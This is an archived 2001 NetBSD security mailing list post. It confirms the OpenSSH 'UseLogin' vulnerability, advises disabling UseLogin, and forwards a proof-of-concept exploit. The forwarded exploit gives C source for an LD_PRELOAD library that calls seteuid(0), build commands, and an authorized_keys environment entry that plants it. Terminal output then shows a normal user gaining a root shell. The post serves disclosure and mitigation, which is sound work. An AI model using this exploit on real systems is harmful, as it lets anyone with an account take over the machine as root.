tech-security: Fwd: OpenSSH UseLogin proof of concept exploit

Subject: Fwd: OpenSSH UseLogin proof of concept exploit
To: None <tech-security@netbsd.org>
From: Lubomir Sedlacik <salo@Xtrmntr.org>
List: tech-security
Date: 12/06/2001 02:49:49
--8GpibOaaTibBMecb
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

hi,

confirmed on:

NetBSD 1.5X  - OpenSSH_2.9 NetBSD_Secure_Shell-20010624
NetBSD 1.5.2 - OpenSSH_2.5.1 NetBSD_Secure_Shell-20010614

everyone who use "UseLogin yes" and have key authentication allowed for loc=
al
users, please at least set "UseLogin no" or comment it out.


----- Forwarded message from "[WaR]" <war@genhex.org> -----

Date: Thu, 6 Dec 2001 00:34:34 +0000
From: "[WaR]" <war@genhex.org>
To: vuln-dev@securityfocus.com
Subject: OpenSSH UseLogin proof of concept exploit

--[ OpenSSH UseLogin bug proof of concept exploit ]--
  by [WaR] <war@genhex.org> / http://www.genhex.org


--[ Intro ]--

 I was very curious in finding out how to exploit this problem. Although
 I don't think anyone uses this feature, I looked into the matter anyway.
 Here it goes. It was tested on the following platforms:
  - Slackware 7.1 with OpenSSH3.0p1
  - RedHat 7.1 with OpenSSH_2.9p2
  - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
  - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
 The exploit should work as long as UseLogin does. YMMV.

 This is based on libroot from squidge@onyx.infonexus.com,
 published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
 you thought it wouldn't happen again...).

 Kudos to pmsac@toxyn.org for his help figuring out the problem with
 the Slackware UseLogin, testing on OpenBSD, and giving the ideia for
 the seteuid(0) (it originally was a system("/bin/sh");).

--[ Code ]--

 Create a lib.c file with the next content:

 ---8<---
 #include <stdio.h>
 int setuid(int uid){
   printf("setuid() called...\n");
   seteuid(0);
 }
 ---8<---

 Compile it into a library:
 gcc -c -o lib.o lib.c
 ld -shared -o libroot.so lib.o
 chmod 755 ./libroot.so


 Now, for the tricky (*g*) part...

 You must have an account on the machine, and create an entry
 on $HOME/.ssh/authorized_keys (or authorized_keys2) with:

 environment=3D"LD_PRELOAD=3D<your home>/libroot.so" <your public key>

 When sshd receives your connection, it will export this variable
 into the environment *BEFORE* running login. Somewhere after this,
 it executes a setuid. When it does, it makes a seteuid(0).

 $ id
 uid=3D1000(war) gid=3D100(users) groups=3D100(users)
 $ ssh war@localhost
 Enter passphrase for key '/home/war/.ssh/id_dsa':
 sh-2.04# id
 uid=3D0(root) gid=3D100(users) groups=3D100(users)


 It also works remotely. Anyway, you _MUST_ have an account on
 the victim machine so you can setup the enviroment, and login.
 And obviously (duh) it must have UseLogin enabled.

 That's all.


 shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.



-- [WaR]
"if you can't hack it, hit it with a hammer"

----- End forwarded message -----

regards,

--=20
-- Lubomir Sedlacik <salo@Xtrmntr.org>   ASCII Ribbon campaign against  /"\=
 --
--                  <salo@silcnet.org>   e-mail in gratuitous HTML and  \ /=
 --
--                                       Microsoft proprietary formats   X =
 --
-- PGPkey: http://Xtrmntr.org/salo.pgp                                  / \=
 --
-- Key Fingerprint: DBEC 8BEC 9A90 ECEC 0FEF  716E 59CE B70B 7E3B 70E2     =
 --

--8GpibOaaTibBMecb
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (NetBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8Ds69Wc63C347cOIRAv82AJ9d3GZZTnQVTicuPJ4E0FL/hNglUQCeJA7f
wE//WZtoVtbmP3Jp30M8zlw=
=Zrrl
-----END PGP SIGNATURE-----

--8GpibOaaTibBMecb--